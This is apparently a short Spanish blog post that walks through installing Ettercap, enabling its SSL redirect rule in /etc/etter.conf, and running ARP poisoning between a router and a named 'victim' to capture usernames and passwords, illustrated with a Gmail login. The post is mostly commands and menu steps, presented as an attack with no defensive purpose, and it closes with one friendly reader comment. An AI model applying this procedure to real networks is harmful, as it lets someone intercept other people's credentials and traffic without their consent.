
Primero instalamos la aplicación:
apt-get install ettercap
Ahora configuramos Ettercap para que sea capaz de tratar con SSL, editamos el fichero /etc/etter.conf
vi /etc/etter.conf
Descomentamos la línea:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Ahora entramos en modo consola como root:
ettercap -C
Nos dirigimos al menú Sniff --> Unified Sniffing
Buscamos los Hosts de nuestra red:
Hosts -->Scan for Hosts
Listamos los Hosts encontrados:
Hosts-->Host List
Presionamos 1 para la IP del Router y 2 para la IP de la víctima.
Empezamos el envenenamiento de las tablas ARP:
MITM-->ARP Poisoning
En parameters escribimos remote
Empezamos el ataque:
Start-->Start Sniffing
En la parte inferior "User Messages" podremos ver el usuario y su correspondiente password.
Dejo una captura de un usuario imaginario accediendo a Gmail:

1 comentario:
loco, que hacia tiempo que no me pasaba por aqui.
veo que sigue adelante y que empiezas a despegar. ole, sigue asi tio. un abrazo!!
Publicar un comentario